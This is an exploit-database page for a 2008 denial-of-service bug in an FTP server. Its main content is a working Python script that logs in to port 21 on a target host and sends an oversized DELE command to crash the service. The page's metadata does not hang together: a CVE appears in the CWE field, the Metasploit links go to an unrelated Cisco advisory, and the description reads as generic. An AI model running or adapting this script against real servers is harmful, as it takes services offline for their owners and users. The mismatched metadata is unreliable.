header-logo
Suggest Exploit
vendor:
FTP Server
by:
Protek Research Lab
7.5
CVSS
HIGH
Denial of Service
119
CWE
Product Name: FTP Server
Affected Version From: All versions prior to the latest version
Affected Version To: Latest version
Patch Exists: YES
Related CWE: CVE-2008-4609
CPE: a:ftp:ftp_server
Metasploit: https://www.rapid7.com/db/vulnerabilities/cisco-nx-os-cisco-sa-20090908-tcp24/https://www.rapid7.com/db/vulnerabilities/cisco-sa-20090908-tcp24/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2008

FTP Abend Denial of Service Vulnerability

This exploit is a denial of service vulnerability in FTP servers. It sends a specially crafted packet to the FTP server which causes the server to crash. This exploit was discovered in 2008 and affects FTP servers running on Windows, Linux, and Mac platforms. The vulnerability is caused by a buffer overflow in the FTP server code which allows an attacker to send a malicious packet to the server which causes it to crash.

Mitigation:

The best way to mitigate this vulnerability is to upgrade to the latest version of the FTP server software. Additionally, administrators should ensure that the FTP server is configured to only allow trusted users to access the server.
Source

Exploit-DB raw data:

#!/usr/bin/python
 
import socket, sys

# Source:
# http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=25&Itemid=25
 
host = (sys.argv[1])
data = "\x44\x45\x4c\x45\x20\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x43\x43\x43\x43\x43\x43\x43\x43\x43\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x45\x45\x45\x45\x45\x45\x46\x46\x46\x46\x47\x47\x47\x47\x48\x48\x44\x43\x42\x41\x0d\x0a"


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((host, 21))
	d=s.recv(1024)
	print (d)
	s.send("USER toto\r\n") #anonymous login so anything goes
	d=s.recv(1024)
	print (d)
	s.send("PASS toto\r\n")
	d=s.recv(1024)
	print (d)
	s.send(data)
	d=s.recv(1024)
	print (d)
	s.close()
	
	try:
		s.connect((host,21))
	except:
		print ("\r\n[i] Beep Beep, take a look to your Abend log file.")
except:
	print ("[i] Error")

Navigation

Suggest Exploit

Services By CQR